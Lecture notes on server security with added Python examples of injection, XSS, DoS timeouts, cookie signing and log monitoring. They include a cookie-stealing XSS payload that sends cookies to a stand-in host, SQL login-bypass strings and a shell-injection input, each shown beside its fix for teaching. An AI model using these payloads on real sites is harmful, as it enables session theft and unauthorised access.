
Chapter 10 (Week 11)

Server Security

Dr Rudi Rusdiah
T1005
13 May 2017 (Week 12)
Server Security 1/3
Three categories of network security: user workstations, network devices, and servers.
Why servers are targets of attack: (1) they hold large volumes of critical data; (2) they are connected to many workstations, so a compromised server is a foothold into the rest of the network.
Maintain a security mindset before developing secure products or environments.
Security improvements come at a cost in time, money and convenience.
Approaches to improving security during software design and development:
1. Risk-Based Security Controls. Deciding how to address security is often confronted with the following:
a. The technology is highly technical and not fully understood by management.
b. The threat is usually abstract and hard to translate into dollars.
c. The greatest threat is often the insider, so corporate culture and trust matter.
d. The items at risk are intangible: information, reputation and uptime.
e. Predictions are often wrong, and false alarms are common.
f. Many providers offer security services, but often only partial solutions.
g. The amount spent does not correlate with the security obtained; e.g. a $30 modem on an internal PC can bypass a $200,000 firewall installation.
Management perspective: security is insurance. So the risk to a server should be assessed from the likelihood that an attack occurs and its business impact.
Server Security 2/3
2. Defence in Depth (DiD) Principle: a series of protection measures that work as a whole, not in isolation. E.g. firewalls, a DMZ zone, proxies, cloud services, anti-virus, EWS (Early Warning Systems), deterrents, etc.
Applying DiD to software development and server application features:
1. Do not concentrate all security resources on a single protection. E.g. a $200,000 firewall protecting the Internet edge can be bypassed through a $30 modem, because an internal PC has a direct outside connection and its user had no awareness training.
2. Every protective measure counts: e.g. require strong passwords even for internal users who are trusted.
3. Keep It Simple and Secure: complexity and confusion help an attacker exploit the system. Applications should be transparent so that security flaws are easily detected; closed systems can hide bad security design. Fully document the design (e.g. state that a system uses 128-bit encryption, and with which algorithm).
Complex server applications may consist of several components, e.g. one component for password authentication and a second component for access to the database. The logical interfaces between these components are Trust Boundaries, and data crossing them must be validated.
4. Respect the Adversary: attackers do not play by the rules, so the designer should plan for the unexpected. Hardware and software might fail (Murphy's law), but they should fail in a safe and predictable manner. Attackers will try to crash or overload the system to circumvent a security control, then exploit and compromise it.
A fail-safe design has a better chance of withstanding an attack.
Server Security 3/3
5. Security Awareness: a security mindset, educating developers and network engineers about the security risks involved:
a. Security policy, and roles and responsibilities when developing applications.
b. Product specification requirements: e.g. financial institutions are subject to the Gramm-Leach-Bliley Act, and credit card companies and Visa card issuers impose their own requirements (the list below mirrors the payment-card industry's PCI DSS requirements).
Protect privacy and private data by the following: (1) install a network firewall to protect from the Internet; (2) keep security patches up to date; (3) encrypt stored data; (4) encrypt data sent across networks; (5) use anti-virus software and keep it updated; (6) restrict access to data on a business need-to-know basis; (7) assign a unique ID to everyone who accesses data; (8) do not use vendor defaults for security parameters and passwords; (9) regularly test systems and processes; (10) restrict physical access to cardholder information.
c. Security basics: passwords, physical security, policies.
d. Security awareness testing.

6. Business Impact: the justification for security spending is to minimize the security risk and the business impact of any attack.
E.g. a significant loss of credit card information: (a) the business impact is hundreds of man-hours; (b) an extensive internal investigation with its man-hours, legal costs and investigation expenses; (c) damage to customer relations and loss of future business; (d) damage to the organization's public image.
Establish a Secure Development Environment
The development environment should address business risk and impact, covering the following areas: (1) Management; (2) Security Awareness; (3) Software Development; (4) Configuration Control; (5) Network Security.
1. Management: management support is important, and the time and effort spent making a secure product must be valued. Developing a secure product is costly in the short run, but it is cheaper when security design and expertise are involved from the beginning rather than retrofitted. There must be a security officer in charge.
2. Configuration Control Board (CCB), responsible for: (1) establishing formal change management, since attacks often succeed during a change; (2) establishing a formal requirements and testing program.
3. Network support and development.
Secure Development Practices
There are many methods for developing code for secure applications.
Security requirements are laid down early in the development process.
Tools and techniques used to design and develop clean, efficient applications that support the development of secure code:
(1) Handling of sensitive data, which needs special handling techniques, especially as more and more personal and sensitive information is put on servers. Passwords should be stored only as salted one-way hashes (using a deliberately slow algorithm such as PBKDF2, bcrypt, scrypt or Argon2), so they cannot be extracted from the server; the only way to break them is brute-force cracking, which the slow hash makes expensive. Passwords, credit card information and financial information must never be sent in the clear and should not be displayed on screen.
(2) Keeping the server code clean and not exposing too much information to a would-be attacker. Hackers examine HTML and scripts for information to use in an attack, so comments should be stripped from operational code. Third-party web server and FTP server software often presents a banner indicating the software version, which can be used to narrow down the target of attack; turn such banners off (e.g. ServerTokens Prod and ServerSignature Off in Apache httpd, server_tokens off in nginx).
(3) Choosing a coding language. Avoid writing server code directly in C or C++, which do not detect or prevent out-of-bounds memory access, the cause of buffer overflows. Memory-safe languages such as Java check array bounds at runtime and have built-in security features.
(4) Avoiding content injection: data (content) entered by a user should never be put directly into a command or query.
Input Validation & Content Injection
All input from an untrusted user or entity must be verified and validated. In a client-server environment it is difficult to validate the client, so the client should be treated as untrusted.
Content injection occurs when the server takes input from the user and places that input into commands or SQL statements, i.e. the user's input gets injected into a command that is executed by the server.
Content injection is dangerous when the server does not keep a clear distinction and separation between input data and the command being executed.
There is a fundamental difference in paradigm between the developer and the attacker when designing web-based applications. The developer assumes that the user's goal and the application's goal are the same, and so tends to assume that users always provide correct input; if there is an error, the developer assumes an honest mistake. The attacker, on the other hand, treats input as the key method to DISRUPT the application, and knows there is little to be gained by proceeding through the application as the developer expects.
Developers should therefore test all possible inputs carefully and thoroughly.
Be careful with special characters in input. A Unix shell interprets characters such as the dot (.), the backtick (`), the semicolon (;) and the pipe (|) specially, so input containing them must never be passed to a shell unescaped.
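As an added example (not from the original slides), the shell-metacharacter problem above in Python, for a hypothetical "ping this host" feature whose host name comes straight from a web form. It shows the three levels: the vulnerable shell string, the same string with shlex.quote applied when a shell is unavoidable, and the preferred form that validates against an allow-list and never involves a shell at all. The command run is echo rather than ping so it is harmless and runs anywhere with /bin/sh.

```python
"""Shell metacharacters in user input: the unsafe shell string versus an argument list."""
import re
import shlex
import subprocess

# Assumption: a hypothetical "ping this host" feature; the input comes straight from a web form.
# Allow-list for a DNS host name (labels of letters, digits and hyphens, joined by dots).
HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(host: str) -> str:
    """Builds the command the way the slide warns against: raw input pasted into a shell string."""
    return "echo pinging %s" % host


def run_vulnerable(host: str) -> str:
    # shell=True hands the whole string to /bin/sh, which interprets ; | ` $() & and friends.
    return subprocess.run(vulnerable_command(host), shell=True, capture_output=True, text=True).stdout


def run_quoted(host: str) -> str:
    """If a shell really is required, quote the input so the shell sees it as one word."""
    cmd = "echo pinging %s" % shlex.quote(host)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def run_safe(host: str) -> str:
    # 1. Validate against the allow-list: reject bad input rather than trying to clean it.
    if not HOSTNAME_RE.match(host):
        raise ValueError("invalid hostname: %r" % host)
    # 2. Never involve a shell: pass an argv list, so the input is exactly one argument.
    return subprocess.run(["echo", "pinging", host], capture_output=True, text=True).stdout


if __name__ == "__main__":
    attack = "example.com; echo INJECTED"
    print(run_vulnerable(attack))   # second line "INJECTED": the attacker's command ran
    print(run_quoted(attack))       # one line; the payload is printed, not executed
    print(run_safe("example.com"))  # pinging example.com
```

Validation and the argv list are separate defences: the list form stops the shell from interpreting the input, and the allow-list stops the input from reaching the called program as an option (a host name beginning with "-" would otherwise be parsed by ping as a flag).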
Cross-Site Scripting (abbreviated XSS rather than CSS, to avoid confusion with Cascading Style Sheets): an attacker gets a script into a page served by a trusted website, either by storing it in the application or by reflecting it from a crafted link, usually delivered by e-mail or another web page. The script runs in the victim's browser with the trusted site's privileges and can capture the cookies and information exchanged between the user and that site.
Cookies remember a user between visits or prevent the user from having to log in repeatedly to the same web application, which is exactly why they are worth stealing.
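As an added example (not from the original slides), the reflected form of XSS: a search-results page that echoes the query back. The attacker's payload and the exfiltration host evil.example are constructed for the demonstration. The vulnerable render inserts the raw string, so the browser parses the payload as markup and runs it; the safe render escapes it with html.escape, so the same text is displayed but never executed.

```python
"""Reflected XSS: rendering untrusted input into HTML with and without escaping."""
import html
import re

# Constructed input: what an attacker would put in a search box or a crafted link
# (the classic cookie-stealing payload; evil.example is a hypothetical collection host).
PAYLOAD = '<script>new Image().src="http://evil.example/c?"+document.cookie</script>'

TEMPLATE = "<p>Results for: {query}</p>"


def render_vulnerable(query: str) -> str:
    """Interpolates the raw string: the browser sees a real <script> element and runs it."""
    return TEMPLATE.format(query=query)


def render_safe(query: str) -> str:
    """Escapes & < > and quotes, so the payload is shown as text and never executed."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script(page: str) -> bool:
    """Crude check used only to make the difference visible; it is not a sanitiser."""
    return bool(SCRIPT_TAG.search(page))


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))  # script tag intact: executes in the victim's browser
    print(render_safe(PAYLOAD))        # &lt;script&gt;...: rendered as harmless text
```

Escaping has to match the context (HTML body, attribute, URL, JavaScript string each need different rules), which is why template engines that escape by default are preferred over hand-rolled calls. Independently of that, marking the session cookie HttpOnly stops document.cookie from reading it, so a missed escape does not hand the session to the attacker.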
SQL Injection (SQLi)
SQL injection: manipulating the database by supplying SQL commands to the web application, which then executes them against the database.
Consider the following script from a server application (ASP-style; the quote characters were lost in extraction and are restored here):

    sql = "select username from users " & _
          "where userid = '" & request("userid") & "' " & _
          "and password = '" & request("password") & "'"

If the user enters the user name

    any_bogus_name' or 1=1 and password = '

with an empty password, the resulting SQL is

    select username from users where userid = 'any_bogus_name' or 1=1 and password = '' and password = ''

The single quote in the input closed the string literal, and everything after it was interpreted as SQL rather than as data. Note that because AND binds more tightly than OR, this particular payload only matches rows whose stored password is empty; the usual form of the attack comments out the rest of the query instead, e.g. any_bogus_name' or 1=1 --, which returns the first user in the table regardless of password.
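As an added example (not code from the original slides), the login query above reproduced against an in-memory SQLite table, with the injection carried out by both payloads and then blocked by the parameterised form. The users table and its rows are constructed for the demonstration, and passwords are kept in plaintext only so the injection stays visible; a real table stores salted hashes.

```python
"""SQL injection against the slide's login query, and the parameterised fix (sqlite3, stdlib)."""
import sqlite3
from typing import Optional


def make_db() -> sqlite3.Connection:
    """Constructed sample users table (plaintext passwords for demonstration only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (userid text, password text, username text)")
    conn.executemany(
        "insert into users values (?, ?, ?)",
        [("alice", "hunter2", "Alice Admin"), ("bob", "s3cret", "Bob Builder")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, userid: str, password: str) -> Optional[str]:
    """Same construction as the slide's ASP code: user input spliced into the SQL text."""
    sql = ("select username from users where userid = '" + userid +
           "' and password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def lookup_safe(conn: sqlite3.Connection, userid: str, password: str) -> Optional[str]:
    """Placeholders: the driver sends the SQL and the values separately, so a quote in
    the input is just a quote in the data and can never close the string literal."""
    sql = "select username from users where userid = ? and password = ?"
    row = conn.execute(sql, (userid, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    attack = "any_bogus_name' or 1=1 --"
    print(lookup_vulnerable(db, attack, ""))  # Alice Admin: logged in without a password
    print(lookup_safe(db, attack, ""))        # None: the payload is just a user id that does not exist
```

The slide's own payload ending in "password = '" is also covered by the test below: against this table it returns nothing, because the trailing "and password = ''" clauses only match empty passwords, which is the precedence point made above.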
Stored Procedures
A hacker, like an internal or external user, who gains access to the database can learn where the key data are stored.
The application server should not use any direct Structured Query Language (SQL). Instead, modifications, additions or deletions of database information should always go through a stored procedure that performs the function.
The SQL login used by the application then has no right to access data in the tables directly; only the stored procedures can access them (grant the application account EXECUTE on the procedures and nothing on the tables).
If direct SQL is allowed and no stored procedure is used, a hacker can issue a SELECT and pull back all of a table's data.
If a stored procedure is used, it allows data to be retrieved only in the built-in amount, format and rules, so the system limits the amount of data a hacker can retrieve.
Caveat: a stored procedure is only a defence if it does not itself build dynamic SQL from its arguments; a procedure that concatenates its parameters into an EXEC string is just as injectable as the application code it replaced.
Dynamic Scripting & DoS Attacks
Dynamically executing scripts built from user input is risky: the attacker can supply abnormal input. Dynamic scripting should be disabled at the database level or the Java environment level.
Limit all unusual input to prevent DoS and DDoS attacks.
For instance, a POST request sent without any body may never complete on the server; it uses up server resources, i.e. the TCP connection remains open waiting for data that never arrives.
If the attacker initiates hundreds of connections that are never fully completed, the server must keep the half-open connections in memory, because the protocol expects each connection to be either completed or reset.
When the memory for new connections fills up, no more users can connect to the server, and it may crash.
This is a DoS (Denial of Service) attack. Mitigations are timeouts for incomplete requests, limits on concurrent connections per client, and, for half-open TCP handshakes (SYN floods), SYN cookies in the operating system.
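As an added example (not from the original slides), the stalled-POST case above handled at the application layer: a tiny TCP listener that gives each connection a bounded time and a bounded number of bytes to deliver a complete request header, answering 408 and closing instead of holding the socket open. The demo function connects to the listener on localhost with one complete request and one that never finishes its header. The timeout and size values are demo assumptions; real servers use seconds-scale timeouts and also cap concurrent connections per source address.

```python
"""Bounding what an incomplete request may cost: a per-connection header timeout and size cap."""
import socket
import threading
from typing import Dict, List

# Assumptions: demo values chosen so the example runs in under a second.
HEADER_TIMEOUT = 0.5      # seconds to wait for the complete request header
MAX_HEADER_BYTES = 8192   # refuse headers larger than this


def handle(conn: socket.socket) -> str:
    """Serve one connection; return what happened to it (for the demo and test)."""
    conn.settimeout(HEADER_TIMEOUT)
    buf = b""
    try:
        while b"\r\n\r\n" not in buf:
            chunk = conn.recv(1024)
            if not chunk:               # peer closed before finishing the header
                return "closed"
            buf += chunk
            if len(buf) > MAX_HEADER_BYTES:
                conn.sendall(b"HTTP/1.1 431 Request Header Fields Too Large\r\n\r\n")
                return "too_large"
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\n\r\nok")
        return "served"
    except socket.timeout:
        # The slide's stalled POST: give up instead of holding the socket forever.
        conn.sendall(b"HTTP/1.1 408 Request Timeout\r\n\r\n")
        return "timeout"
    finally:
        conn.close()


def demo() -> Dict[str, List[str]]:
    """Start a listener, send one complete and one stalled request, report both sides' view."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    server_view: List[str] = []
    client_view: List[str] = []

    def serve_two():
        for _ in range(2):
            c, _addr = srv.accept()
            server_view.append(handle(c))

    t = threading.Thread(target=serve_two)
    t.start()

    good = socket.create_connection(("127.0.0.1", port))
    good.sendall(b"GET / HTTP/1.1\r\nHost: demo\r\n\r\n")
    client_view.append(good.recv(1024).split(b"\r\n")[0].decode())
    good.close()

    slow = socket.create_connection(("127.0.0.1", port))
    slow.sendall(b"POST /upload HTTP/1.1\r\nHost: demo\r\n")     # header never terminated
    client_view.append(slow.recv(1024).split(b"\r\n")[0].decode())  # blocks until the server gives up
    slow.close()

    t.join()
    srv.close()
    return {"server": server_view, "client": client_view}


if __name__ == "__main__":
    print(demo())  # {'server': ['served', 'timeout'], 'client': ['HTTP/1.1 200 OK', 'HTTP/1.1 408 Request Timeout']}
```

The same idea applies one layer down: the half-open TCP connections described above are bounded by the kernel's SYN backlog and SYN cookies, which an application cannot influence, so both layers need their limits set.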
Use Encryption 1/2
Encryption maintains the confidentiality of data.
The price of encryption is performance: the cost of additional hardware to recover bandwidth and throughput, or of software.
Encryption is used in transmission, storage, and data verification (covered in Ch 14 & 16).

Encrypting data in storage adds another layer to the Defence in Depth (DiD) model, in case physical security is breached or the server host is compromised.
Encrypt in transmission any sensitive or private data: name, address, phone number; credit card number, PIN (Personal Identification Number); financial data; salary information; shopping cart contents, etc.

E.g. SSL (Secure Sockets Layer, today superseded by TLS) and VPN (Virtual Private Network).
- SSL/TLS encrypts application traffic between a server and any SSL-compatible client, such as a web browser.
- VPN: all network traffic is encrypted and tunneled. Because both ends of the VPN must be compatible and coordinated, it is not a solution for the general public, but for a small set of users.
Use Encryption 2/2
Without encryption, a cookie passes from the web server to the web browser in clear text. If the cookie is encrypted by the server, only the server holds the key to decrypt it when it is returned by the browser. Cookie integrity is maintained with a hash field: the hashing algorithm passes the original cookie through a one-way function and produces a short string, which the server recomputes and compares when the cookie comes back (use a keyed hash, an HMAC, so that the client cannot recompute it after tampering). Encryption and hashing together ensure the privacy and integrity of the information with little overhead and add Defence in Depth (DiD).
Web application sessions are often hijacked and replayed by a man-in-the-middle (MitM); avoid this by using SSL/TLS.
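As an added example (not code from the original slides), the integrity half of the cookie scheme above: a cookie value carrying an absolute expiry and an HMAC-SHA256 tag over both, verified in constant time. A forged or edited value fails the check, and an expired one is rejected, which is also the session time-out described later under "Controlling users and access". The server key is a fixed constructed value so the example is reproducible; a real server generates it once and keeps it out of the code base.

```python
"""Tamper-evident, expiring cookie values: value|expiry|HMAC, verified in constant time."""
import base64
import hashlib
import hmac
import time
from typing import Optional

# Assumption: fixed demo key. A real server generates a random key once and loads it
# from a secret store or environment variable, never from source control.
SERVER_KEY = b"constructed-demo-key-do-not-use"


def _mac(payload: bytes) -> str:
    return base64.urlsafe_b64encode(hmac.new(SERVER_KEY, payload, hashlib.sha256).digest()).decode("ascii")


def make_cookie(value: str, ttl_seconds: int, now: Optional[float] = None) -> str:
    """Encode the value and an absolute expiry, then append an HMAC over both fields."""
    current = now if now is not None else time.time()
    expires = int(current + ttl_seconds)
    payload = "%s|%d" % (base64.urlsafe_b64encode(value.encode("utf-8")).decode("ascii"), expires)
    return payload + "|" + _mac(payload.encode("utf-8"))


def read_cookie(cookie: str, now: Optional[float] = None) -> Optional[str]:
    """Return the value if the MAC verifies and the cookie has not expired, else None."""
    try:
        value_b64, expires_str, tag = cookie.rsplit("|", 2)
    except ValueError:
        return None                     # malformed
    payload = ("%s|%s" % (value_b64, expires_str)).encode("utf-8")
    # compare_digest on bytes: no early exit, so timing does not reveal how much of the tag matched.
    if not hmac.compare_digest(tag.encode("utf-8"), _mac(payload).encode("ascii")):
        return None                     # forged, or value/expiry edited by the client
    current = now if now is not None else time.time()
    if current >= int(expires_str):
        return None                     # session timed out: force re-authentication
    return base64.urlsafe_b64decode(value_b64).decode("utf-8")


if __name__ == "__main__":
    c = make_cookie("user=alice;role=user", ttl_seconds=900)
    print(c)
    print(read_cookie(c))               # user=alice;role=user
    print(read_cookie(c[:-4] + "AAAA"))  # None: tag no longer matches
```

The value is only base64-encoded here, not encrypted, so this gives integrity and not privacy; for the confidentiality half, encrypt the value with an authenticated cipher (AES-GCM or ChaCha20-Poly1305) before signing, or use a library such as cryptography's Fernet that does both. Send the cookie with the Secure and HttpOnly attributes so it travels only over TLS and is out of reach of page scripts.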

SSL sits above the TCP/IP layer and below application-layer protocols such as HTTP or IMAP. SSL uses TCP/IP on behalf of the application protocol. The handshake allows an SSL-enabled server to authenticate itself to the client, after which server and client establish an encrypted connection.
Negatives of SSL: it reduces the performance of an HTTP server in CPU, memory and network terms. The CPU still has to process the HTTP request, write out the HTTP headers, log the request and push it into the TCP stack, plus the cryptography:
Bandwidth: SSL adds on average only about 1 KB to each transaction.
Latency: SSL with client authentication requires two round trips between server and client before the HTTP session begins, so at least 500 ms is added to the HTTP service time.
Bulk encryption: SSL used RC4 and MD5 in its cipher suites, which run efficiently on 32-bit CPUs. (These figures are historical: RC4 is now prohibited in TLS, the MD5-based suites are gone, and TLS 1.3 uses AEAD ciphers such as AES-GCM and ChaCha20-Poly1305 with a one-round-trip handshake.)
Key exchange: the RSA public-key operation at session setup is the CPU bottleneck on an SSL server, which is why SSL servers are rated in RSA sessions per second.
Netscape data: the performance of an SSL-enabled server was about 20% lower than that of an unencrypted server.
The maximum performance hit occurs when the server and client exchange the handshake messages for authentication and key generation/exchange, which require computationally intensive public key operations.
Operating the Server Safely 1/2
1. Control the server configuration:
(a) Physical security: whether in a public cloud, a data center or on premises, a server is vulnerable to an attacker with physical access. Physical controls support all of CIA (Confidentiality, Integrity and Availability; for availability: UPS, insurance, cooling). Restrict physical access to the server, especially by unauthorized persons. Physical protection should extend to the cabling, network and routers that are critical to the server's operation.
(b) Minimize and separate services, because an attacker will look to break in through the services running on the system. If services are separated, an attack can be localized.
(c) Disable default services/applications that the server OS enables:
(1) Telnet transmits data in clear text; use SSH (Secure Shell) instead. (2) SMTP (Simple Mail Transfer Protocol) mail servers are often targets of attack and, if compromised, a vehicle for illicit communication with the outside world. (3) FTP has had a number of vulnerabilities and must be configured carefully. (4) Finger can be used to gather information for launching an attack. (5) Netstat and Systat (the inetd services) disclose configuration and usage information. (6) Chargen and Echo can be used to launch data-driven or DoS attacks. (7) DNS should be patched regularly. (8) RPC (Remote Procedure Call) services should be removed.
Ensure these extraneous services are disabled or even deleted from the system.
(d) System backup to mitigate risk: the frequency of backup is important. If the loss of a day's worth of data cannot be tolerated, use a zero-downtime failover system. Backups also aid post-attack reconstruction.
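As an added example (not from the original slides), a check for the extraneous services listed under (c): it parses the output of `ss -Hlntp` (the listening-TCP-sockets listing on a modern Linux host) and flags any listener on one of those services' ports, with the bind address and owning process so the reviewer can see whether it is exposed or loopback-only. The sample output is constructed, not taken from a real host, and the port numbers come from /etc/services.

```python
"""Flag extraneous listening services by parsing `ss -Hlntp` output against a port list."""
import re
from typing import Dict, List, Optional, Tuple

# Ports of the legacy services the slide says to disable (assignments from /etc/services).
RISKY_PORTS: Dict[int, str] = {
    7: "echo", 11: "systat", 15: "netstat", 19: "chargen", 21: "ftp", 23: "telnet",
    25: "smtp", 79: "finger", 111: "sunrpc (portmapper)",
}

# Constructed sample of `ss -Hlntp` output (State Recv-Q Send-Q Local Peer Process); not a real host.
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 128 0.0.0.0:23 0.0.0.0:* users:(("inetd",pid=640,fd=5))
LISTEN 0 511 *:443 *:* users:(("nginx",pid=1201,fd=6),("nginx",pid=1202,fd=6))
LISTEN 0 128 0.0.0.0:79 0.0.0.0:* users:(("inetd",pid=640,fd=7))
LISTEN 0 128 [::]:111 [::]:* users:(("rpcbind",pid=500,fd=4))
LISTEN 0 128 127.0.0.1:25 0.0.0.0:* users:(("master",pid=950,fd=13))
"""

PROCESS_RE = re.compile(r'\("([^"]+)",pid=(\d+)')
LOOPBACK = ("127.0.0.1", "[::1]")


def parse_ss_line(line: str) -> Optional[Tuple[str, int, str]]:
    """Return (bind_address, port, process_name) for one LISTEN line, or None if it is not one."""
    fields = line.split()
    if len(fields) < 5 or fields[0] != "LISTEN":
        return None
    addr, _, port = fields[3].rpartition(":")   # handles "0.0.0.0:22", "*:443" and "[::]:111"
    if not port.isdigit():
        return None
    m = PROCESS_RE.search(line)
    return addr, int(port), (m.group(1) if m else "?")


def find_extraneous_listeners(ss_output: str) -> List[Tuple[int, str, str, str, bool]]:
    """Return (port, service, bind_address, process, exposed) for each risky port found listening.

    exposed is False for loopback-only binds, which are lower risk but still worth a look.
    """
    findings = []
    for line in ss_output.splitlines():
        parsed = parse_ss_line(line)
        if parsed is None:
            continue
        addr, port, proc = parsed
        if port in RISKY_PORTS:
            findings.append((port, RISKY_PORTS[port], addr, proc, addr not in LOOPBACK))
    return findings


if __name__ == "__main__":
    for port, service, addr, proc, exposed in find_extraneous_listeners(SAMPLE_SS_OUTPUT):
        print("%-5d %-20s %-12s %-8s %s" % (port, service, addr, proc, "EXPOSED" if exposed else "loopback"))
```

Run it against live output with `ss -Hlntp | python3 check.py` after changing the `__main__` block to read stdin; on a host that still uses inetd, every inetd-owned finding maps to a line to comment out in /etc/inetd.conf, and systemd socket units are disabled with `systemctl disable --now`.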
Operating the Server Safely 2/2
2. Controlling users and access: the OS and host that run the server software are general-purpose computers serving multiple users and multiple applications, so the sysadmin must establish a need-to-know environment, with data access limited to the users who need it.
User activity is grouped into sessions. Cookies are used to identify users and maintain session objects that keep track of user-specific information, e.g. navigation state and the session period. A session that runs too long should time out and be reset, logging the user out so that they must re-authenticate to continue using the service. Session tracking carries state from one request to the next.
Transactions are authorized by entering a user name and password.
Passwords: strong passwords are required, and they should be stored only as salted one-way hashes, never in a recoverable form.
3. Monitoring, auditing and logging:
Logging: recording key information about the server and its services, e.g. the event logs kept by the OS or applications. Logs are useful in reconstructing an attack or incident.
Monitoring: periodic review of logs and other server information, done continuously by the help desk or security operations staff. Regular monitoring identifies incidents and policy and procedural violations.
Auditing: the process of verifying the logs and checking that monitoring is done according to plan and procedure.
Monitoring and logging are a passive yet effective form of intrusion detection.
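As an added example (not from the original slides) of monitoring as intrusion detection, a small detector run over constructed sshd lines in the syslog auth.log format: it counts failed logins per source address and user name and reports the sources that cross a threshold. The log lines, host names and addresses are made up for the demonstration, and the threshold is an assumption.

```python
"""Monitoring as intrusion detection: count failed logins per source in auth log lines."""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample lines in the sshd/auth.log format (not from a real system).
SAMPLE_AUTH_LOG = """\
May 13 09:12:01 srv1 sshd[2201]: Failed password for invalid user admin from 203.0.113.7 port 51022 ssh2
May 13 09:12:03 srv1 sshd[2203]: Failed password for invalid user oracle from 203.0.113.7 port 51030 ssh2
May 13 09:12:04 srv1 sshd[2205]: Failed password for root from 203.0.113.7 port 51041 ssh2
May 13 09:12:06 srv1 sshd[2207]: Failed password for root from 203.0.113.7 port 51055 ssh2
May 13 09:12:08 srv1 sshd[2209]: Failed password for root from 203.0.113.7 port 51060 ssh2
May 13 09:15:40 srv1 sshd[2250]: Accepted publickey for deploy from 198.51.100.20 port 40212 ssh2
May 13 09:20:11 srv1 sshd[2301]: Failed password for alice from 198.51.100.20 port 40300 ssh2
May 13 09:20:15 srv1 sshd[2303]: Accepted password for alice from 198.51.100.20 port 40301 ssh2
"""

# "invalid user" appears when the account does not exist; the pattern captures the name either way.
FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
THRESHOLD = 5  # assumption: failures from one source before we call it brute forcing


def failed_logins_by_source(log_text: str) -> Dict[str, Dict[str, int]]:
    """Map source IP -> {username: failure count}."""
    counts: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, src = m.groups()
            counts[src][user] += 1
    return {src: dict(users) for src, users in counts.items()}


def brute_force_sources(log_text: str, threshold: int = THRESHOLD) -> List[str]:
    """Sources whose total failures reach the threshold, worst first."""
    totals = {src: sum(users.values()) for src, users in failed_logins_by_source(log_text).items()}
    return sorted((s for s, n in totals.items() if n >= threshold), key=lambda s: -totals[s])


if __name__ == "__main__":
    for src, users in failed_logins_by_source(SAMPLE_AUTH_LOG).items():
        print(src, users)
    print("brute force suspects:", brute_force_sources(SAMPLE_AUTH_LOG))  # ['203.0.113.7']
```

One failure from a real user (alice, followed by a successful login) stays below the threshold, while a source trying several account names in quick succession, including ones that do not exist, is the pattern worth paging on; tools such as fail2ban apply exactly this logic to block the source automatically.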
Server Applications: web servers (Ch 6) and e-mail (Ch 8) are covered elsewhere.
Three more categories of server:
Data sharing servers, consisting of FTP servers, Lightweight Directory Access Protocol (LDAP) servers and NetBIOS servers.
Peer-to-peer information exchange via a server.
IM (Instant Messaging) and IRC (Internet Relay Chat).

FTP servers:
Exchange files with the public or with unknown users (anonymous FTP): when prompted for a user name, "anonymous" is used. Some anonymous FTP servers allow a writable area or drop-off directory for files. If that area can also be read by anonymous FTP users, it is open to abuse: such drop-off sites become data repositories for abusers to share files through.
If not locked down, an FTP server can be the point of compromise for the server and the network as a whole.
